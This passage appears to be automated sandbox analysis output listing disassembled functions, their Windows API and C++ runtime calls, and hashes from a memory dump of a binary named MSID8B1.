                                                                  • Instruction Fuzzy Hash: C2B14C71C00A09EFCF29DFA4C8859AEB7F5FF14310B1441AAE8156B212D731DB65EB92
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00B24270 Relevance: 15.1, APIs: 10, Instructions: 137timeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • OpenProcess.KERNEL32(00000400,00000000,?,823FDEC6,?,?,?), ref: 00B242D2
                                                                  • OpenProcess.KERNEL32(00000400,00000000,?,?,823FDEC6,?,?,?), ref: 00B242F3
                                                                  • GetProcessTimes.KERNEL32(00000000,?,00000000,00000000,00000000,?,823FDEC6,?,?,?), ref: 00B24326
                                                                  • GetProcessTimes.KERNEL32(00000000,?,00000000,00000000,00000000,?,823FDEC6,?,?,?), ref: 00B24337
                                                                  • CloseHandle.KERNEL32(00000000,?,823FDEC6,?,?,?), ref: 00B24355
                                                                  • CloseHandle.KERNEL32(00000000,?,823FDEC6,?,?,?), ref: 00B24371
                                                                  • CloseHandle.KERNEL32(00000000,?,823FDEC6,?,?,?), ref: 00B24399
                                                                  • CloseHandle.KERNEL32(00000000,?,823FDEC6,?,?,?), ref: 00B243B5
                                                                  • CloseHandle.KERNEL32(00000000,?,823FDEC6,?,?,?), ref: 00B243D3
                                                                  • CloseHandle.KERNEL32(00000000,?,823FDEC6,?,?,?), ref: 00B243EF
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: CloseHandle$Process$OpenTimes
                                                                  • String ID:
                                                                  • API String ID: 1711917922-0
                                                                  • Opcode ID: a7f3fe8167830a47c2000b69fa58517bb746440c85f7910cfc2cfbb0c2ca7200
                                                                  • Instruction ID: 26da529038f54cb3f5eb57982a9b2dbe5af5d7e205f370f111ed73bbae022340
                                                                  • Opcode Fuzzy Hash: a7f3fe8167830a47c2000b69fa58517bb746440c85f7910cfc2cfbb0c2ca7200
                                                                  • Instruction Fuzzy Hash: E8516371D01218EBDB11CFA8D984BEEBBF8FF49714F244299E528B76C0C77459058B68
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00B3BBBD Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 325COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 00B3BBC4
                                                                    • Part of subcall function 00B3254E: __EH_prolog3.LIBCMT ref: 00B32555
                                                                    • Part of subcall function 00B3254E: std::_Lockit::_Lockit.LIBCPMT ref: 00B3255F
                                                                    • Part of subcall function 00B3254E: std::_Lockit::~_Lockit.LIBCPMT ref: 00B325D0
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: H_prolog3Lockitstd::_$Lockit::_Lockit::~_
                                                                  • String ID: %H : %M$%H : %M : %S$%I : %M : %S %p$%b %d %H : %M : %S %Y$%d / %m / %y$%m / %d / %y$:AM:am:PM:pm
                                                                  • API String ID: 1538362411-2891247106
                                                                  • Opcode ID: 800a9f84e40b56898f6ee73239590a7acbbcd254132d9e7c51e03ad52da36d04
                                                                  • Instruction ID: 06cf9c15e7f56c3071eb920f0c70ab564cb3f03b1047a2bad8533a6838080723
                                                                  • Opcode Fuzzy Hash: 800a9f84e40b56898f6ee73239590a7acbbcd254132d9e7c51e03ad52da36d04
                                                                  • Instruction Fuzzy Hash: E5B19F7650010AAFCF19DF68CD95EFE3BE9EB04304F24459AFB06A6269D731CA10DB60
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00B40C9D Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 325COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 00B40CA4
                                                                    • Part of subcall function 00B29270: std::_Lockit::_Lockit.LIBCPMT ref: 00B292A0
                                                                    • Part of subcall function 00B29270: std::_Lockit::_Lockit.LIBCPMT ref: 00B292C2
                                                                    • Part of subcall function 00B29270: std::_Lockit::~_Lockit.LIBCPMT ref: 00B292EA
                                                                    • Part of subcall function 00B29270: std::_Lockit::~_Lockit.LIBCPMT ref: 00B29422
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3
                                                                  • String ID: %H : %M$%H : %M : %S$%I : %M : %S %p$%b %d %H : %M : %S %Y$%d / %m / %y$%m / %d / %y$:AM:am:PM:pm
                                                                  • API String ID: 1383202999-2891247106
                                                                  • Opcode ID: dc093fa54eb6b5d4f9ac053d2aba1ed2611626ec3e271f1017b1b618041d976b
                                                                  • Instruction ID: efcc6da548b7d526c215b948aa401fa754b843db62c64ccae2ec459df535f6cf
                                                                  • Opcode Fuzzy Hash: dc093fa54eb6b5d4f9ac053d2aba1ed2611626ec3e271f1017b1b618041d976b
                                                                  • Instruction Fuzzy Hash: 35B19E7191010AAFCF29EFA8C995DFE3BF9EF14300F1405A9FA06A6261D631DB54EB50
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00B3BF7E Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 325COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 00B3BF85
                                                                    • Part of subcall function 00B28610: std::_Lockit::_Lockit.LIBCPMT ref: 00B28657
                                                                    • Part of subcall function 00B28610: std::_Lockit::_Lockit.LIBCPMT ref: 00B28679
                                                                    • Part of subcall function 00B28610: std::_Lockit::~_Lockit.LIBCPMT ref: 00B286A1
                                                                    • Part of subcall function 00B28610: std::_Lockit::~_Lockit.LIBCPMT ref: 00B2880E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3
                                                                  • String ID: %H : %M$%H : %M : %S$%I : %M : %S %p$%b %d %H : %M : %S %Y$%d / %m / %y$%m / %d / %y$:AM:am:PM:pm
                                                                  • API String ID: 1383202999-2891247106
                                                                  • Opcode ID: 95d1077bd2d3dd2c1d83e3a60d3d4df15156ecd5eced0dade32c3ced41a1bf7a
                                                                  • Instruction ID: 3d7a7e9fa3e91b6807c7b37e013645723a930d68fc32f2dcfb3ae6cf8e44ba10
                                                                  • Opcode Fuzzy Hash: 95d1077bd2d3dd2c1d83e3a60d3d4df15156ecd5eced0dade32c3ced41a1bf7a
                                                                  • Instruction Fuzzy Hash: 09B17C7254010AAFCF19EEE8CD95DBE3FE9EB08340F254199FA06B6252D631DA10DB60
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00B38555 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 78COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog3_GS.LIBCMT ref: 00B3855C
                                                                  • _Maklocstr.LIBCPMT ref: 00B385C5
                                                                  • _Maklocstr.LIBCPMT ref: 00B385D7
                                                                  • _Maklocchr.LIBCPMT ref: 00B385EF
                                                                  • _Maklocchr.LIBCPMT ref: 00B385FF
                                                                  • _Getvals.LIBCPMT ref: 00B38621
                                                                    • Part of subcall function 00B31CD4: _Maklocchr.LIBCPMT ref: 00B31D03
                                                                    • Part of subcall function 00B31CD4: _Maklocchr.LIBCPMT ref: 00B31D19
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: Maklocchr$Maklocstr$GetvalsH_prolog3_
                                                                  • String ID: false$true
                                                                  • API String ID: 3549167292-2658103896
                                                                  • Opcode ID: c819698b01062a50eba040cad5d6f2bf84762e60d77d4a99bdf237e123ac0f77
                                                                  • Instruction ID: 256abaf6dd221e23e14a11e5adc4202a2cb57292656e90f5cbedab16b615ce26
                                                                  • Opcode Fuzzy Hash: c819698b01062a50eba040cad5d6f2bf84762e60d77d4a99bdf237e123ac0f77
                                                                  • Instruction Fuzzy Hash: C12195B2D00314AADF14EFA4D885ACF7BFCEF04710F148596F9189F152DA748644CBA1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00B240B0 Relevance: 12.2, APIs: 8, Instructions: 233memorytimeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • LocalAlloc.KERNEL32(00000040,40000022,823FDEC6,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00B24154
                                                                  • LocalAlloc.KERNEL32(00000040,3FFFFFFF,823FDEC6,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00B24177
                                                                  • LocalFree.KERNEL32(?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00B24217
                                                                  • OpenProcess.KERNEL32(00000400,00000000,?,823FDEC6,?,?,?), ref: 00B242D2
                                                                  • OpenProcess.KERNEL32(00000400,00000000,?,?,823FDEC6,?,?,?), ref: 00B242F3
                                                                  • GetProcessTimes.KERNEL32(00000000,?,00000000,00000000,00000000,?,823FDEC6,?,?,?), ref: 00B24326
                                                                  • GetProcessTimes.KERNEL32(00000000,?,00000000,00000000,00000000,?,823FDEC6,?,?,?), ref: 00B24337
                                                                  • CloseHandle.KERNEL32(00000000,?,823FDEC6,?,?,?), ref: 00B24355
                                                                  • CloseHandle.KERNEL32(00000000,?,823FDEC6,?,?,?), ref: 00B24371
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: Process$Local$AllocCloseHandleOpenTimes$Free
                                                                  • String ID:
                                                                  • API String ID: 1424318461-0
                                                                  • Opcode ID: 926cd98e4c2ec4433573becd8c7e67fd103470da40370e51e943c2976e561c90
                                                                  • Instruction ID: 26a761602954b05388984dcd43b2fa49ad756d2f6a718a5100d33a7cf4146478
                                                                  • Opcode Fuzzy Hash: 926cd98e4c2ec4433573becd8c7e67fd103470da40370e51e943c2976e561c90
                                                                  • Instruction Fuzzy Hash: 0E81A271A00215DFCB14CFA8D985BAEBBF4FB48710F244269E929A77D0D774A9408B94
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00B4266D Relevance: 12.2, APIs: 8, Instructions: 224COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetCPInfo.KERNEL32(?,?,?,?,?), ref: 00B426F8
                                                                  • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00B42786
                                                                  • __alloca_probe_16.LIBCMT ref: 00B427B0
                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00B427F8
                                                                  • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00B42812
                                                                  • __alloca_probe_16.LIBCMT ref: 00B42838
                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00B42875
                                                                  • CompareStringEx.KERNEL32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 00B42892
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: ByteCharMultiWide$__alloca_probe_16$CompareInfoString
                                                                  • String ID:
                                                                  • API String ID: 3603178046-0
                                                                  • Opcode ID: 45e3fd132ffcad6234566cd9b31a33edd92fc1b0e84fbca05338ca18d8303c8a
                                                                  • Instruction ID: fea1a668c3d0d30bb2a5b9452113041e524eb843c85b334c0ba0deeb8623b4b7
                                                                  • Opcode Fuzzy Hash: 45e3fd132ffcad6234566cd9b31a33edd92fc1b0e84fbca05338ca18d8303c8a
                                                                  • Instruction Fuzzy Hash: BF719035900209ABDF219FA4CC85AEE7BF6EF45750FA80199F904A7251DB75CE00FB60
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00B4215A Relevance: 12.2, APIs: 8, Instructions: 175COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 00B421A3
                                                                  • __alloca_probe_16.LIBCMT ref: 00B421CF
                                                                  • MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 00B4220E
                                                                  • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00B4222B
                                                                  • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00B4226A
                                                                  • __alloca_probe_16.LIBCMT ref: 00B42287
                                                                  • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00B422C9
                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00B422EC
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: ByteCharMultiStringWide$__alloca_probe_16
                                                                  • String ID:
                                                                  • API String ID: 2040435927-0
                                                                  • Opcode ID: 987618307a6c803df56da37b4279099dfe78bda6bc507914dc1eab4e6bdf1720
                                                                  • Instruction ID: 08155613ef4a3629ed60c922eaf66157a5e1a10af7522ddeedadae2af7124173
                                                                  • Opcode Fuzzy Hash: 987618307a6c803df56da37b4279099dfe78bda6bc507914dc1eab4e6bdf1720
                                                                  • Instruction Fuzzy Hash: 80519E7260021ABFDF209F64CC85FAA7BF9EF44740F5544A9FA15A7190DB748E10BBA0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00B28610 Relevance: 10.7, APIs: 7, Instructions: 157memoryCOMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00B28657
                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00B28679
                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00B286A1
                                                                  • LocalAlloc.KERNEL32(00000040,00000044,00000000,823FDEC6,?,00000000), ref: 00B286F9
                                                                  • __Getctype.LIBCPMT ref: 00B2877B
                                                                  • std::_Facet_Register.LIBCPMT ref: 00B287E4
                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00B2880E
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$AllocFacet_GetctypeLocalRegister
                                                                  • String ID:
                                                                  • API String ID: 2372200979-0
                                                                  • Opcode ID: 299e85e550608323bfb682abe9217059b7781afe28a492c2d56fb0db7752abde
                                                                  • Instruction ID: d9b55f2dcb6e5791f384a744e90760c83da2bda9ddc6654960839abd3ab85519
                                                                  • Opcode Fuzzy Hash: 299e85e550608323bfb682abe9217059b7781afe28a492c2d56fb0db7752abde
                                                                  • Instruction Fuzzy Hash: 6861E0B1D01654CFDB21DF68D940B9ABBF4FF14314F248299D849AB391EB34AE85CB90
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00B29270 Relevance: 10.6, APIs: 7, Instructions: 135memoryCOMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00B292A0
                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00B292C2
                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00B292EA
                                                                  • LocalAlloc.KERNEL32(00000040,00000018,00000000,823FDEC6,?,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 00B29342
                                                                  • __Getctype.LIBCPMT ref: 00B293BD
                                                                  • std::_Facet_Register.LIBCPMT ref: 00B293F8
                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00B29422
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$AllocFacet_GetctypeLocalRegister
                                                                  • String ID:
                                                                  • API String ID: 2372200979-0
                                                                  • Opcode ID: 374a3799a42af7986b47125e640c3c7b1c0203686e624a1379b9e03d49a36881
                                                                  • Instruction ID: dfcfb2a79568504e941d981ce5534c3d58030a906375d52feed9d5a48711fe75
                                                                  • Opcode Fuzzy Hash: 374a3799a42af7986b47125e640c3c7b1c0203686e624a1379b9e03d49a36881
                                                                  • Instruction Fuzzy Hash: 19519771904228DFCB21DF68D844BAEBBF4EF14714F248199E84DAB391DB74AE41CB91
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00B43F20 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 122COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _ValidateLocalCookies.LIBCMT ref: 00B43F57
                                                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 00B43F5F
                                                                  • _ValidateLocalCookies.LIBCMT ref: 00B43FE8
                                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 00B44013
                                                                  • _ValidateLocalCookies.LIBCMT ref: 00B44068
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                  • String ID: csm
                                                                  • API String ID: 1170836740-1018135373
                                                                  • Opcode ID: 8a199f06257f3e5f6e137fb373868bad3103f0fcf89a01ac928e4326d2ea7154
                                                                  • Instruction ID: f77e06773f1acff27c45ae3431cd42f21af32478f094bec19d6518022aef0992
                                                                  • Opcode Fuzzy Hash: 8a199f06257f3e5f6e137fb373868bad3103f0fcf89a01ac928e4326d2ea7154
                                                                  • Instruction Fuzzy Hash: 7E419134E00209ABCF10DF68C881A9EBBF5FF45718F188199E9189B392CB759F15DB91
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00B572FB Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • FreeLibrary.KERNEL32(00000000,?,00B57408,00B53841,0000000C,?,00000000,00000000,?,00B57632,00000021,FlsSetValue,00B6BD58,00B6BD60,?), ref: 00B573BC
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: FreeLibrary
                                                                  • String ID: api-ms-$ext-ms-
                                                                  • API String ID: 3664257935-537541572
                                                                  • Opcode ID: 11d066c106a82ac3dcd973c82b65421e476c88718b4a8f27aac452aae0155d51
                                                                  • Instruction ID: 361af390cee88585a81d30f6e83cc1747f5172231d883f218d2f9e77405cbbca
                                                                  • Opcode Fuzzy Hash: 11d066c106a82ac3dcd973c82b65421e476c88718b4a8f27aac452aae0155d51
                                                                  • Instruction Fuzzy Hash: 5C21D131B89211ABCB219B64AC45B6E37E8DF42771B2401E0ED15E7290EF74EE05D6A4
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00B2B500 Relevance: 9.2, APIs: 6, Instructions: 151memoryCOMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00B2B531
                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00B2B54F
                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00B2B577
                                                                  • LocalAlloc.KERNEL32(00000040,0000000C,00000000,823FDEC6,?,00000000,00000000), ref: 00B2B5CF
                                                                  • std::_Facet_Register.LIBCPMT ref: 00B2B6B7
                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00B2B6E1
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$AllocFacet_LocalRegister
                                                                  • String ID:
                                                                  • API String ID: 3931714976-0
                                                                  • Opcode ID: ca41067b2a2000b837ae9ae879f2c26b2cc8798dcb464adb434d9f27111c6912
                                                                  • Instruction ID: 55b9439108d161362b19aa4f6adf44f6c1013e8f9f6d3c4dc80a3f56373f5df1
                                                                  • Opcode Fuzzy Hash: ca41067b2a2000b837ae9ae879f2c26b2cc8798dcb464adb434d9f27111c6912
                                                                  • Instruction Fuzzy Hash: 1A51AD71900218DFDB12DF58D890BAEBBF4FF14314F244599E819AB391DBB5EA44CB81
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00B2B700 Relevance: 9.1, APIs: 6, Instructions: 128memoryCOMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00B2B731
                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00B2B74F
                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00B2B777
                                                                  • LocalAlloc.KERNEL32(00000040,00000008,00000000,823FDEC6,?,00000000,00000000), ref: 00B2B7CF
                                                                  • std::_Facet_Register.LIBCPMT ref: 00B2B863
